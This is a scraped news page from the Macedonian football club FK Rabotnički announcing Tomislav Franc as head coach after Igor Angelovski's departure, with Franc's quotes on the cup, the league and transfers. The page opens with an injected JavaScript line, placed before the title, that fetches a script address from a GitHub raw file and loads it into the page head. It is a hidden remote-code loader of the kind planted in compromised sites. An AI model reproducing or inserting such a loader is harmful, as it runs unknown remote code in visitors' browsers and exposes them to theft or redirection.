;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Франц: Работнички е реномиран клуб, чест и обврска е да се предводи од клупата
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Франц: Работнички е реномиран клуб, чест и обврска е да се предводи од клупата

По заминувањето на Игор Ангеловски од тренерската позиција, ФК Работнички вчера за нов шеф на стручниот штаб го именува Томислав Франц. Тој во последните три сезони му беше прв асистент на Ангеловски, а веќе седум години е дел од клубот, па раководството одлучи дека има одлични предиспозиции и пред се квалитет, да ја продолжи во континуитет работата со сениорскиот тим. По зимската пауза, Франц ќе ги прозива фудбалерите на 8.јануари, и ќе ги предводи во следните предизвици.

„Голема чест и обврска е да се предводи тим како Работнички. Јасно е што значи ФК Работнички во македонскиот фудбал, еден од најреномираните клубови, кој во континуитет бележи одлични резултати, освојува трофеи, а на одличен начин се претставува и во Европа. Благодарност до раководството за укажаната доверба, ќе го дадам својот максимум, а и повеќе од тоа, за да ја оправдам одлуката на претседателот Драган Поповски и шансата што ја добивам. Во суштина, долг период сум во ФК Работнички, ќе продолжиме да работиме напорно со цел да ги оствариме зацртаните цели на клубот. Тоа секако е излез на европска цена и следната натпреварувачка сезона. Се наоѓаме во полуфиналето на Купот на Македонија и посакуваме да стигнеме до хет – трик во ова натпреварување, третпат последователно да го освоиме трофејот. Исто така, и во првенството ќе настојуваме да завршиме најмалку на третата позиција, која носи излез во Европа“, вели Томислав Франц.

Добро ги познава квалитетите и темпераментот на фудбалерите, и, секако, подготвен е за новиот предизвик.

„Подготвен сум, апсолутно, да одговорам на новите работни задачи. Знам дека сега одговорноста ќе биде моја, како за водењето на тимот од клупата, но пред се за остварените резултати. И јасно ми е дека во ФК Работнички се бараат успеси, победи, трофеи. Ќе работиме сите заедно, максимално напорно, за да продолжиме во ист стил како и досега. Имавме одлични моменти со Игор Ангеловски на кормилото, и јас ќе се трудам, заедно со сите останати во клубот, да продолжиме по тој пат“, истакнува новиот шеф на стручниот штаб.

Првата прозивка ќе биде на 8.јануари, а дотогаш ќе треба да се состави и трансфер – листа, во пресрет на пролетниот дел од сезоната.

„Заедно со раководството ќе работиме и на тој план, на „освежување“ на тимот за пролетниот дел од шампионатот. Освен капитенот Баже Илијоски и играчот за врска Стефан Вујчиќ, сите останати фудбалери се под договор со клубот. Ќе се водат разговори и со Илијоски и Вујчиќ, а ќе се обидеме и да доведеме одредени засилувања. Секако, за тоа многу повеќе ќе се знае до стартот на зимските подготовки, но и до самото завршување на зимскиот преоден рок“, јасен е Томислав Франц.

Leave a Reply